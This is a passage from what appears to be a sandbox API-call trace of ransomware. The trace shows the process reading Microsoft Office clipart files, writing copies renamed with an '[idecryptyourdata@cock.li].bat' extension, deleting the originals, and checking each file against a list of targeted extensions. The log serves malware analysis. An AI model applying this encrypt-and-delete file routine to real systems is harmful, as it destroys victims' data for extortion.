liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.942] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0181.943] GetLastError () returned 0x0 [0181.943] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1350, lpOverlapped=0x0) returned 1 [0181.997] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1360, lpOverlapped=0x0) returned 1 [0181.999] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.999] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.999] SetEndOfFile (hFile=0x380) returned 1 [0181.999] CloseHandle (hObject=0x380) returned 1 [0181.999] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.999] SetEndOfFile (hFile=0x334) returned 1 [0182.000] CloseHandle (hObject=0x334) returned 1 [0182.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf")) returned 1 [0182.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.001] lstrlenW (lpString=".doc") returned 4 [0182.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.001] lstrlenW (lpString=".docx") returned 5 [0182.001] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.001] lstrlenW (lpString=".pdf") returned 4 [0182.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.001] lstrlenW (lpString=".xls") returned 4 [0182.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.001] lstrlenW (lpString=".xlsx") returned 5 [0182.001] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.001] lstrlenW (lpString=".ppt") returned 4 [0182.001] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.001] lstrlenW (lpString=".zip") returned 4 [0182.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.001] lstrlenW (lpString=".rar") returned 4 [0182.001] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.001] lstrlenW (lpString=".bz2") returned 4 [0182.001] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.001] lstrlenW (lpString=".7z") returned 3 [0182.001] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.002] lstrlenW (lpString=".dbf") returned 4 [0182.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.002] lstrlenW (lpString=".1cd") returned 4 [0182.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.002] lstrlenW (lpString=".jpg") returned 4 [0182.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.002] lstrlenW (lpString=".doc") returned 4 [0182.002] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString=".docx") returned 5 [0182.002] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.002] lstrlenW (lpString=".pdf") returned 4 [0182.002] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString=".xls") returned 4 [0182.002] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.002] lstrlenW (lpString=".xlsx") returned 5 [0182.002] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.002] lstrlenW (lpString=".ppt") returned 4 [0182.002] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.002] lstrlenW (lpString=".zip") returned 4 [0182.002] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.002] lstrlenW (lpString=".rar") returned 4 [0182.002] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.002] lstrlenW (lpString=".bz2") returned 4 [0182.002] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.003] lstrlenW (lpString=".7z") returned 3 [0182.003] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.003] lstrlenW (lpString=".dbf") returned 4 [0182.003] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.003] lstrlenW (lpString=".1cd") returned 4 [0182.003] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 68 [0182.003] lstrlenW (lpString=".jpg") returned 4 [0182.003] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.003] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.003] lstrlenW (lpString="J0105396.WMF") returned 12 [0182.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.004] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=11012) returned 1 [0182.004] CloseHandle (hObject=0x334) returned 1 [0182.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf")) returned 0x220 [0182.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.004] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.004] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.005] GetLastError () returned 0x0 [0182.005] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2b04, lpOverlapped=0x0) returned 1 [0182.007] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2b10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2b10, lpOverlapped=0x0) returned 1 [0182.008] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.008] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.009] SetEndOfFile (hFile=0x380) returned 1 [0182.009] CloseHandle (hObject=0x380) returned 1 [0182.009] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.009] SetEndOfFile (hFile=0x334) returned 1 [0182.010] CloseHandle (hObject=0x334) returned 1 [0182.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf")) returned 1 [0182.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.020] lstrlenW (lpString=".doc") returned 4 [0182.020] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.020] lstrlenW (lpString=".docx") returned 5 [0182.020] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.021] lstrlenW (lpString=".pdf") returned 4 [0182.021] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString=".xls") returned 4 [0182.021] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.021] lstrlenW (lpString=".xlsx") returned 5 [0182.021] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.021] lstrlenW (lpString=".ppt") returned 4 [0182.021] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.021] lstrlenW (lpString=".zip") returned 4 [0182.021] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.021] lstrlenW (lpString=".rar") returned 4 [0182.021] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString=".bz2") returned 4 [0182.021] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString=".7z") returned 3 [0182.021] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.021] lstrlenW (lpString=".dbf") returned 4 [0182.021] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.021] lstrlenW (lpString=".1cd") returned 4 [0182.021] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.021] lstrlenW (lpString=".jpg") returned 4 [0182.021] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.021] lstrlenW (lpString=".doc") returned 4 [0182.022] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString=".docx") returned 5 [0182.022] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.022] lstrlenW (lpString=".pdf") returned 4 [0182.022] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString=".xls") returned 4 [0182.022] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.022] lstrlenW (lpString=".xlsx") returned 5 [0182.022] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.022] lstrlenW (lpString=".ppt") returned 4 [0182.022] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.022] lstrlenW (lpString=".zip") returned 4 [0182.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.022] lstrlenW (lpString=".rar") returned 4 [0182.022] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString=".bz2") returned 4 [0182.022] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString=".7z") returned 3 [0182.022] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.022] lstrlenW (lpString=".dbf") returned 4 [0182.022] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.022] lstrlenW (lpString=".1cd") returned 4 [0182.022] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 68 [0182.022] lstrlenW (lpString=".jpg") returned 4 [0182.022] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.023] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.023] lstrlenW (lpString="J0105398.WMF") returned 12 [0182.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.023] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=3328) returned 1 [0182.023] CloseHandle (hObject=0x334) returned 1 [0182.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf")) returned 0x220 [0182.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.024] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.024] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.025] GetLastError () returned 0x0 [0182.025] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xd00, lpOverlapped=0x0) returned 1 [0182.397] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xd10, lpOverlapped=0x0) returned 1 [0182.398] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.398] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.398] SetEndOfFile (hFile=0x380) returned 1 [0182.398] CloseHandle (hObject=0x380) returned 1 [0182.398] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.398] SetEndOfFile (hFile=0x334) returned 1 [0182.399] CloseHandle (hObject=0x334) returned 1 [0182.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.399] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf")) returned 1 [0182.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.400] lstrlenW (lpString=".doc") returned 4 [0182.400] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.400] lstrlenW (lpString=".docx") returned 5 [0182.400] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.400] lstrlenW (lpString=".pdf") returned 4 [0182.400] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.400] lstrlenW (lpString=".xls") returned 4 [0182.400] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.400] lstrlenW (lpString=".xlsx") returned 5 [0182.400] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.400] lstrlenW (lpString=".ppt") returned 4 [0182.400] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.400] lstrlenW (lpString=".zip") returned 4 [0182.400] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.400] lstrlenW (lpString=".rar") returned 4 [0182.400] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.400] lstrlenW (lpString=".bz2") returned 4 [0182.400] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString=".7z") returned 3 [0182.401] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.401] lstrlenW (lpString=".dbf") returned 4 [0182.401] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.401] lstrlenW (lpString=".1cd") returned 4 [0182.401] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.401] lstrlenW (lpString=".jpg") returned 4 [0182.401] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.401] lstrlenW (lpString=".doc") returned 4 [0182.401] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString=".docx") returned 5 [0182.401] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.401] lstrlenW (lpString=".pdf") returned 4 [0182.401] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString=".xls") returned 4 [0182.401] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.401] lstrlenW (lpString=".xlsx") returned 5 [0182.401] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.401] lstrlenW (lpString=".ppt") returned 4 [0182.401] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.401] lstrlenW (lpString=".zip") returned 4 [0182.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.402] lstrlenW (lpString=".rar") returned 4 [0182.402] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.402] lstrlenW (lpString=".bz2") returned 4 [0182.402] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.402] lstrlenW (lpString=".7z") returned 3 [0182.402] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.402] lstrlenW (lpString=".dbf") returned 4 [0182.402] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.402] lstrlenW (lpString=".1cd") returned 4 [0182.402] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 68 [0182.402] lstrlenW (lpString=".jpg") returned 4 [0182.402] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.402] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.402] lstrlenW (lpString="J0105600.WMF") returned 12 [0182.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.403] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=8680) returned 1 [0182.403] CloseHandle (hObject=0x334) returned 1 [0182.403] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf")) returned 0x220 [0182.403] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.403] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.403] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 